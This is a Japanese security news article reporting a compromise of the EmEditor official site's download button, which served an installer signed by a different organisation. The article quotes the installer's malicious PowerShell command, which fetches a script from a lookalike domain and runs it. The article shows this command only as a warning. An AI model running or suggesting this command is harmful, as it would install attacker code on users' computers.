EmEditor 公式サイトの「今すぐダウンロード」ボタンが改変、別組織のデジタル署名が付与されたファイルをダウンロード | ScanNetSecurity
2025.12.26(金)

EmEditor 公式サイトの「今すぐダウンロード」ボタンが改変、別組織のデジタル署名が付与されたファイルをダウンロード

 株式会社エムソフトは12月23日、EmEditor 公式サイトにおけるダウンロード導線に関するセキュリティインシデントについて発表した。

インシデント・事故 インシデント・情報漏えい
トップページ
トップページ 全 7 枚 拡大写真

 株式会社エムソフトは12月23日、EmEditor 公式サイトにおけるダウンロード導線に関するセキュリティインシデントについて発表した。

 これはEmEditor 公式サイトの「今すぐダウンロード」ボタンで第三者からの改変が疑われる事象を確認したというもので、2025年12月20日午前11時39分から12月23日午前5時50分に当該ボタンからダウンロードされたインストーラーについて、同社のデジタル署名が付与されていない別ファイルがダウンロードされた可能性があるという。

 同社によると、ホームページの「今すぐダウンロード」ボタンのリンク先は通常、リダイレクト(転送)設定になっているが、当該期間中、リダイレクト設定が第三者により改変された疑いがあり、本来とは異なるURLからファイルがダウンロードされる状態となっていた。

 当該ファイルは同社が作成したものではなく、現在は削除済みとなっている。また、当該ファイルには同社の署名ではなく、「WALSHAM INVESTMENTS LIMITED」という別組織のデジタル署名が付与されていることを確認している。

 同社によると、問題となる可能性のあるインストーラーは、実行時に下記のコマンドを実行しようとするが、危険なので、このコマンドを実行しないよう呼びかけている。

powershell.exe "irm emeditorjp.com | iex"

 同社では今後、原因究明と再発防止に向けて必要な対策を講じるとのこと。

《ScanNetSecurity》

関連記事

この記事の写真

/

特集

PageTop

アクセスランキング

  1. 三晃空調にランサムウェア攻撃

    三晃空調にランサムウェア攻撃

  2. ネットワーク機器を経由してサーバに侵入 埼玉県商工会連合会にランサムウェア攻撃

    ネットワーク機器を経由してサーバに侵入 埼玉県商工会連合会にランサムウェア攻撃

  3. 海外からクラウドサーバへの RDP 接続で侵入 ~ ウエットマスターへのランサムウェア攻撃

    海外からクラウドサーバへの RDP 接続で侵入 ~ ウエットマスターへのランサムウェア攻撃

  4. テーオーシーのネットワークへの不正アクセス、ファイルの一部の暗号化を確認

    テーオーシーのネットワークへの不正アクセス、ファイルの一部の暗号化を確認

  5. データが削除されシステム障害が発生 ~ e-計量に不正アクセス

    データが削除されシステム障害が発生 ~ e-計量に不正アクセス

ランキングをもっと見る
PageTop